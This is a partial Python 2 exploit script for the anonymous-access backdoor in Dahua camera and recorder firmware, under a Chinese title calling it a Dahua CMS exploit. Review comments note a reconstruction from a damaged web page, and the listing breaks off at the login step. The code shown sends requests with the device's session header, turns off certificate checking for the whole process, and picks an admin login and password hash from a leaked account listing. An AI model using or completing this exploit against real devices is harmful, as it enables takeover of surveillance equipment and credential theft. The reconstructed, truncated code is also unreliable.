
大华系统cms漏洞exp

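  #!/usr/bin/python2.7
#
# Dahua backdoor Generation 2 and 3
# Author: bashis March 2017
#
# Credentials: No credentials needed (Anonymous)
#Jacked from git history
#
# NOTE(review): the page this listing comes from collapsed it onto two lines,
# replaced ASCII quotes with typographic ones, turned "\n" into "/n", dropped
# all indentation and inserted its own page title inside a try block. Quotes
# and escapes are restored below and the nesting is reconstructed from syntax
# (confirm against the author's original before relying on it). A large part
# of the script is absent from the page; see the marker in Gen2. Nothing that
# the page lacks has been filled in.
#
import string
import sys
import socket
import argparse
import urllib, urllib2, httplib
import base64
import ssl
import json
import commentjson # pip install commentjson
import hashlib


class HTTPconnect:
    """Thin urllib2 wrapper used for every request the script makes.

    Holds the target host, the scheme, optional "user:password" Basic-auth
    credentials and three flags (verbose, Raw, noexploit).
    """

    def __init__(self, host, proto, verbose, creds, Raw, noexploit):
        self.host=host
        self.proto=proto
        self.verbose=verbose
        self.credentials=creds
        self.Raw=Raw
        self.noexploit=False
        self.noexploit=noexploit

    def Send(self, uri, query_headers, query_data,ID):
        """Send one request to proto://host + uri.

        query_data, when truthy, is JSON-encoded and sent as the body;
        otherwise the request carries no body. ID, when truthy, is sent in
        the DhWebClientSessionID header. Returns the response object when
        Raw is set, else the response body.
        """
        self.uri=uri
        self.query_headers=query_headers
        self.query_data=query_data
        self.ID=ID

        # Connect-timeout in seconds
        timeout=5
        socket.setdefaulttimeout(timeout)

        url='%s://%s%s' % (self.proto, self.host, self.uri)

        if self.verbose:
            print "[Verbose] Sending:", url

        if self.proto=='https':
            if hasattr(ssl, '_create_unverified_context'):
                print "[i] Creating SSL Unverified Context"
                # Replaces the process-wide default HTTPS context, so no
                # certificate is verified for any HTTPS request made after
                # this point, not only for this one.
                ssl._create_default_https_context=ssl._create_unverified_context

        if self.credentials:
            Basic_Auth=self.credentials.split(':')
            if self.verbose:
                # Verbose mode writes the password to stdout in clear text.
                print "[Verbose] User:",Basic_Auth[0],"Password:",Basic_Auth[1]
            try:
                pwd_mgr=urllib2.HTTPPasswordMgrWithDefaultRealm()
                pwd_mgr.add_password(None, url, Basic_Auth[0], Basic_Auth[1])
                auth_handler=urllib2.HTTPBasicAuthHandler(pwd_mgr)
                opener=urllib2.build_opener(auth_handler)
                urllib2.install_opener(opener)
            except Exception as e:
                print "[!] Basic Auth Error:",e
                sys.exit(1)

        if self.noexploit and not self.verbose:
            print "[<] 204 Not Sending!"
            html="Not sending any data"
        else:
            if self.query_data:
                req=urllib2.Request(url, data=json.dumps(self.query_data), headers=self.query_headers)
                if self.ID:
                    req.add_header('DhWebClientSessionID',self.ID)
            else:
                req=urllib2.Request(url, None, headers=self.query_headers)
                if self.ID:
                    req.add_header('DhWebClientSessionID',self.ID)
            rsp=urllib2.urlopen(req)
            # print rsp
            if rsp:
                print "[<] %s OK" % rsp.code

        # NOTE(review): placement of this return block at method level is
        # reconstructed; on the noexploit path `rsp` is never assigned.
        if self.Raw:
            return rsp
        else:
            html=rsp.read()
            return html


class Dahua_Backdoor:
    """Container for the per-generation routines; only part of Gen2 is on the page."""

    def __init__(self, rhost, proto, verbose, creds, Raw, noexploit):
        self.rhost=rhost
        self.proto=proto
        self.verbose=verbose
        self.credentials=creds
        self.Raw=Raw
        self.noexploit=False
        self.noexploit=noexploit

    # Generation 2
    def Gen2(self,response,headers):
        """Select an account from a colon-separated account listing.

        `response` is read line by line; each record is split on ':' and
        field 1 is printed as the login name, field 2 as the password hash.

        What this shows a defender: per the file header no credentials are
        needed, and the input here is a listing that already contains every
        account's name and password hash. A device that serves such a
        listing to an anonymous client has disclosed those hashes whether or
        not anything further is done with them. Keeping the device's web
        interface off untrusted networks and running vendor firmware that
        removes the unauthenticated access are the relevant mitigations.
        """
        self.response=response
        self.headers=headers

        html=self.response.readlines()
        for line in html:
            # Skip comment lines and empty lines. The page shows "/n" here;
            # a one-character comparison only makes sense against "\n".
            if line[0]=="#" or line[0]=="\n":
                continue
            line=line.split(':')[0:25]
            # Selection order: an account named 'admin', then one named
            # '888888', then the first record whose field 3 is '1'
            # (presumably a privilege/group flag; not established by the page).
            if line[1]=='admin':
                print "[i] Chosing Admin Login: {}, PWD hash: {}".format(line[1],line[2])
                ADMIN=line[1]
                PWD=line[2]
                break
            elif line[1]=='888888':
                print "[i] Choosing Admin Login: {}, PWD hash: {}".format(line[1],line[2])
                ADMIN=line[1]
                PWD=line[2]
                break
            else:
                if line[3]=='1':
                    print "Choosing Admin Login [{}]: {}, PWD hash: {}".format(line[0],line[1],line[2])
                    ADMIN=line[1]
                    PWD=line[2]
                    break

        #
        # Login 1
        #
        print "[>] Requesting our session ID"

        # ---- LISTING TRUNCATED ON THE PAGE ----
        # The page jumps from the start of a `query_args=` assignment straight
        # to the end of the script. The rest of Gen2 and everything between it
        # and the final error handler is missing and is not reconstructed
        # here. The surviving tail is kept below as a comment because the
        # statements that enclose it are gone (the hosting site's URL, which
        # appears inside the final message on the page, is left out):
        #
        #     ... .format(e.code)
        #     except Exception as e:
        #         print "[!] Detect of target failed (%s)" % e
        #         sys.exit(1)
        #     print "\n[*] All done\n"
        #     sys.exit(0)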
